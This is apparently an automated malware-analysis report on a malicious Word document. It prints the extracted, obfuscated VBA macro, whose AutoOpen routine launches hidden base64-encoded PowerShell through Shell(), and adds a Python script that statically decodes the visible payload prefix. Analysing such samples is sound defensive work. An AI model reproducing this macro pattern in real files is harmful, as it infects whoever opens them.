Verdict: MALICIOUS
Risk score: 242
Heuristics: 7
- ClamAV: Doc.Malware.Valyria-7086204-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-7086204-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: the "no modern VBA project was recovered" wording conflicts with the VBA source olevba extracted below; treat this marker as redundant with the AutoOpen finding for this sample.)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML XML namespace identifier, which appears in any document carrying drawing markup; it is not a network indicator for this sample.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12970 bytes | 57084f2ff5cf1015c7b1a4771797a06c2ce36705958cfe2bada0767a835cf093 |

Preview: first 1,000 lines of the extracted script (cut off below where the report truncates it)
```vb
Attribute VB_Name = "jRdwPLBiNu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function QjFOzMuFH()
On Error Resume Next
jBzli = Fix(78796 / CSng(35193) * DLWoO * Odfij)
VhBn = CDate(9304)
GVQBnI = Fix(47579 / CSng(54290) * PiJumB * hGqdV)
VhBn = CDate(6606)
QjFOzMuFH = WIGvnJZSW + IZrGPU + RVEouTFqpi + WbGNzM + AkVBGHCqw + dsJUBkjmNH + vGXjncJ + rLqcdZd + UTHzWuPHmc + QsFTE
uLzBH = Fix(24278 / CSng(33240) * GTTaji * rjtjVv)
VhBn = CDate(76819)
End Function
Sub Autoopen()
On Error Resume Next
UaNbzX = Fix(81139 / CSng(51725) * CGWqpG * PQfbp)
VhBn = CDate(51739)
hKDLhri (QjFOzMuFH)
USwPJ = Fix(69965 / CSng(72708) * SGjdbu * TLQssX)
VhBn = CDate(50146)
End Sub
Function hKDLhri(FCDzacX)
On Error Resume Next
tBZcU = Fix(9953 / CSng(30068) * qtOtI * IjqpVn)
VhBn = CDate(29394)
QVAzjzuJqI = nJNAfilZQ + Shell(hiljBwBPh + (Chr(vbKeyP)) + mfjjjfBWJw + FCDzacX + sWwPKFD, nYOjN + vbHide + rOOhDttIU)
LfWiw = Fix(38560 / CSng(22201) * iouGFN * HRcDuq)
VhBn = CDate(70106)
End Function

Attribute VB_Name = "AcUDjCCC"
Function WIGvnJZSW()
On Error Resume Next
RVkpM = Fix(45547 / CSng(20907) * kFcFvV * wPwzJM)
VhBn = CDate(47429)
cmklnOKU = "owersHeLL" + " -WinDo" + "wsTyle hidden" + " -e IAAoAC" + "gAKAAi" + "AHsANwA2AH0Aew" + "AxAH0AewA1ADAAf" + "QB7ADkAMQ" + "B9AHsAO"
cHVkm = Fix(90689 / CSng(68362) * EDWfzX * VPBfF)
VhBn = CDate(112)
SuwwUAli = "QB9AHsANwA5AH0" + "AewAyADUAfQB" + "7ADIA" + "OAB9AHsAMQA2AH0" + "AewAyADkAfQB" + "7ADYANQB9AHs"
BFCPGM = Fix(82295 / CSng(64932) * otSHi * nYBBiY)
VhBn = CDate(2995)
NtfXtHh = "AMwAwAH0A" + "ewA4ADIAfQ" + "B7ADYAOQB9AHsAN" + "AAxAH0AewA4" + "ADUAfQB7ADQ" + "AOQB9AHsAMwA" + "2AH0AewA3AH0Aew" + "A3ADAAfQB7ADI"
qvZCa = Fix(69524 / CSng(16177) * TCdFQi * oXjWo)
VhBn = CDate(65460)
sHckqkENNO = "ANwB9" + "AHsANwA" + "4AH0AewA4ADE" + "AfQB7ADYANgB9"
iPifcd = Fix(57294 / CSng(8813) * ZzjMU * JQzGHa)
VhBn = CDate(31529)
dtMdwVWLk = "AHsAMwA0AH0AewA" + "0AH0AewA1AH0Ae" + "wA4AD" + "MAfQB7ADI"
WIGvnJZSW = cmklnOKU + SuwwUAli + NtfXtHh + sHckqkENNO + dtMdwVWLk
End Function
Function IZrGPU()
On Error Resume Next
cZFCNd = Fix(90562 / CSng(4235) * qDRJY * IfDOhD)
VhBn = CDate(11379)
jamUMd = "AMwB9AHs" + "ANgAzA" + "H0Aew" + "A4ADgAfQB7ADQA" + "NgB9A" + "HsANwA0AH0Aew" + "AzAH0A" + "ewA3ADEAfQB7ADY" + "AOAB9AHs"
VCGNTY = Fix(65501 / CSng(50973) * OlBGX * QaaXmp)
VhBn = CDate(16957)
RESjJBi = "AMQA4AH0Aew" + "A1ADgAfQ" + "B7ADA" + "AfQB7ADYAMAB9" + "AHsANQA5AH0A" + "ewAzA"
YlVpb = Fix(8231 / CSng(22412) * aWpjzH * bdiQr)
VhBn = CDate(4999)
iuiHzUKzd = "DkAfQB7" + "ADIAN" + "gB9AHs" + "AMgA0AH" + "0AewA2ADQAfQB7A" + "DYANwB9AH" + "sANAAwAH0" + "AewA1A"
WokEn = Fix(76234 / CSng(13246) * SvMzhc * jGWAfK)
VhBn = CDate(59211)
clPDDG = "DYAfQB7ADQANAB9" + "AHsANAA1A" + "H0AewAyAD" + "EAfQB7ADcAMgB" + "9AHsAMw" + "AxAH0AewAx" + "ADUAf" + "QB7ADMAMwB9AHsA" + "NQA1AH0AewA"
IZrGPU = jamUMd + RESjJBi + iuiHzUKzd + clPDDG
End Function
Function RVEouTFqpi()
On Error Resume Next
nbIKw = Fix(89191 / CSng(15724) * RAzOj * WRYcv)
VhBn = CDate(7399)
CiTBSpzB = "2ADEAfQ" + "B7ADgAOQB9" + "AHsAOAA2" + "AH0AewA1ADQAfQB" + "7ADQANwB9AHsANA" + "AzAH0AewAyADIA" + "fQB7ADIAfQB" + "7ADUAMQB9AHs" + "AMwA4AH0A"
WAZndu = Fix(46203 / CSng(88541) * XOrXzd * cIlKVv)
VhBn = CDate(97841)
YGcjTGzYpMO = "ewA0ADIAfQB7ADU" + "ANwB9AH" + "sAMQA" + "zAH0AewA" + "zADcAfQB7ADYAfQ" + "B7ADEANAB9AHsAM" + "QAyAH0Aew" + "A4ADcAf"
NRijEc = Fix(5429 / CSng(29217) * XRajXU * kfadl)
VhBn = CDate(43486)
nriURZCFm = "QB7ADgAMAB" + "9AHsANwAzAH0A" + "ewA3ADcAfQB7AD" + "YAMgB9AHsAMw" + "AyAH0" + "AewA3" + "ADUAfQB7ADgAfQB" + "7ADEA"
HtnvU = Fix(18479 / CSng(86634) * bBrZM * opOUz)
VhBn = CDate(32689)
BkQsQqRuVNc = "NwB9AH" + "sAMQAwAH0" + "AewA4ADQAfQB" + "7ADUAMgB9AHsAMQ" + "AxAH0AewAzADUAf" + "QB7ADIAMAB" + "9AHsANAA"
RVEouTFqpi = CiTBSpzB + YGcjTGzYpMO + nriURZCFm + BkQsQqRuVNc
... (truncated)
```

Reading the preview: Autoopen calls hKDLhri with the value of QjFOzMuFH, which concatenates ten string-builder functions (WIGvnJZSW, IZrGPU, RVEouTFqpi, WbGNzM, AkVBGHCqw, dsJUBkjmNH, vGXjncJ, rLqcdZd, UTHzWuPHmc, QsFTE); only the first two are complete in the preview and the third is cut off by the truncation. hKDLhri hands that string to Shell(). Chr(vbKeyP) evaluates to "P" (vbKeyP is 80), so the command line begins "PowersHeLL -WinDowsTyle hidden -e " followed by a base64-encoded UTF-16LE PowerShell command. The other operands in the Shell() expression (hiljBwBPh, mfjjjfBWJw, sWwPKFD, nJNAfilZQ, nYOjN, rOOhDttIU) are never assigned, so they are Empty and concatenate as empty strings; the window-style argument therefore reduces to vbHide. The Fix()/CDate() statements, the multiplications by unassigned variables, and the On Error Resume Next lines are junk that never affects the command, which is why the OLE_VBA_SHELL and OLE_VBA_AUTOOPEN heuristics fire on the cleaned-up source.
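The Shell() command above can be recovered from the extracted source without running the macro: evaluate the string-literal concatenations in order, treat names that are never assigned as Empty (the VBA behaviour under On Error Resume Next), resolve Chr(vbKeyP), then base64-decode the text after -e as UTF-16LE. The script below is an added example and is not part of the analyzer's report or of the sample. It embeds a constructed transcription of the first builder function, the collecting concatenation, and the Shell() call from the preview (junk lines dropped, and the hKDLhri parameter FCDzacX replaced by the QjFOzMuFH argument Autoopen passes). Because the remaining nine builders are truncated on the page, the base64 is a prefix of the real payload and is not a multiple of four characters, so the decoder drops the trailing partial quantum and any odd byte instead of raising. The visible prefix decodes to ` ((("{76}{1}{50}{91}{`, the shape of PowerShell's "{n}{m}..." -f 'a','b' format-operator obfuscation; the operator and its operand list lie in the truncated part, so this example does not attempt to resolve them.

```python
"""Reassemble the command the macro above hands to Shell() and decode its
PowerShell -e payload.  Added example; not part of the analyzer's report."""
import base64
import re

# Constructed sample, transcribed from the preview above: the first string-builder
# function, the concatenation that collects all ten builders, and the Shell() call.
# Junk Fix()/CDate() lines are dropped.  On the page the Shell() line sits in
# hKDLhri(FCDzacX), which Autoopen calls with QjFOzMuFH, so the parameter is
# substituted by hand here.  The other nine builders are cut off by the
# truncation, so the recovered payload is only a prefix of the real one.
SAMPLE_VBA = r'''
Function WIGvnJZSW()
On Error Resume Next
cmklnOKU = "owersHeLL" + " -WinDo" + "wsTyle hidden" + " -e IAAoAC" + "gAKAAi" + "AHsANwA2AH0Aew" + "AxAH0AewA1ADAAf" + "QB7ADkAMQ" + "B9AHsAO"
SuwwUAli = "QB9AHsANwA5AH0" + "AewAyADUAfQB" + "7ADIA" + "OAB9AHsAMQA2AH0" + "AewAyADkAfQB" + "7ADYANQB9AHs"
NtfXtHh = "AMwAwAH0A" + "ewA4ADIAfQ" + "B7ADYAOQB9AHsAN" + "AAxAH0AewA4" + "ADUAfQB7ADQ" + "AOQB9AHsAMwA" + "2AH0AewA3AH0Aew" + "A3ADAAfQB7ADI"
sHckqkENNO = "ANwB9" + "AHsANwA" + "4AH0AewA4ADE" + "AfQB7ADYANgB9"
dtMdwVWLk = "AHsAMwA0AH0AewA" + "0AH0AewA1AH0Ae" + "wA4AD" + "MAfQB7ADI"
WIGvnJZSW = cmklnOKU + SuwwUAli + NtfXtHh + sHckqkENNO + dtMdwVWLk
End Function
QjFOzMuFH = WIGvnJZSW + IZrGPU + RVEouTFqpi + WbGNzM + AkVBGHCqw + dsJUBkjmNH + vGXjncJ + rLqcdZd + UTHzWuPHmc + QsFTE
QVAzjzuJqI = nJNAfilZQ + Shell(hiljBwBPh + (Chr(vbKeyP)) + mfjjjfBWJw + QjFOzMuFH + sWwPKFD, nYOjN + vbHide + rOOhDttIU)
'''

# VBA KeyCode constants seen in Chr() calls; vbKeyP is 80, i.e. "P".
VB_KEY_CONSTANTS = {"vbKeyP": 80}

# Tokens of a concatenation expression: "literal", Chr(x), name, '+', '(' , ')'.
TOKEN = re.compile(r'"([^"]*)"|Chr\((\w+)\)|([A-Za-z_]\w*)|(\+)|(\()|(\))')


def vb_concat(expr, env):
    """Evaluate a string-building expression the way the macro relies on VBA
    doing it: literals and Chr() are concatenated, a name is looked up in env,
    and a name that was never assigned is Empty, which concatenates as ''."""
    out = []
    for lit, chr_arg, name, *_ in TOKEN.findall(expr):
        if lit:
            out.append(lit)
        elif chr_arg:
            code = VB_KEY_CONSTANTS.get(chr_arg)
            out.append(chr(int(chr_arg) if code is None else code))
        elif name:
            out.append(env.get(name, ""))
    return "".join(out)


def split_first_arg(arglist):
    """Return the text before the first top-level comma of a call's argument list."""
    depth = 0
    for i, ch in enumerate(arglist):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            return arglist[:i]
    return arglist


def recover_shell_command(vba_source):
    """Walk the source top to bottom, evaluating 'name = expr' assignments into
    one flat environment (the builder functions are pure concatenation, so a
    function name and its return value can share a slot), and return the first
    argument of the Shell() call."""
    env = {}
    shell_cmd = None
    for line in vba_source.splitlines():
        line = line.strip()
        call = re.search(r"\bShell\((.*)\)\s*$", line)
        if call:
            shell_cmd = vb_concat(split_first_arg(call.group(1)), env)
            continue
        assign = re.match(r"^([A-Za-z_]\w*)\s*=\s*(.+)$", line)
        if assign:
            env[assign.group(1)] = vb_concat(assign.group(2), env)
    return shell_cmd


def decode_encoded_command(shell_cmd):
    """Decode the base64 after -e / -enc / -EncodedCommand as UTF-16LE.  A
    truncated payload (as here) is cut back to whole base64 quanta and whole
    UTF-16 code units rather than raising."""
    m = re.search(r"(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]+)", shell_cmd)
    if not m:
        return None
    b64 = m.group(1)
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


if __name__ == "__main__":
    cmd = recover_shell_command(SAMPLE_VBA)
    print("Shell() command:", cmd)
    print("decoded -e payload (prefix):", decode_encoded_command(cmd))
```

The flat environment is deliberately naive: it is correct for this family because every builder is a chain of literal concatenations with no branching, and it is what makes the Empty-variable padding (hiljBwBPh, mfjjjfBWJw, sWwPKFD) fall away without emulating VBA. On a full extraction, the decoded text would continue into the -f operand list and the final invocation, which is where the download URL or second-stage command would be.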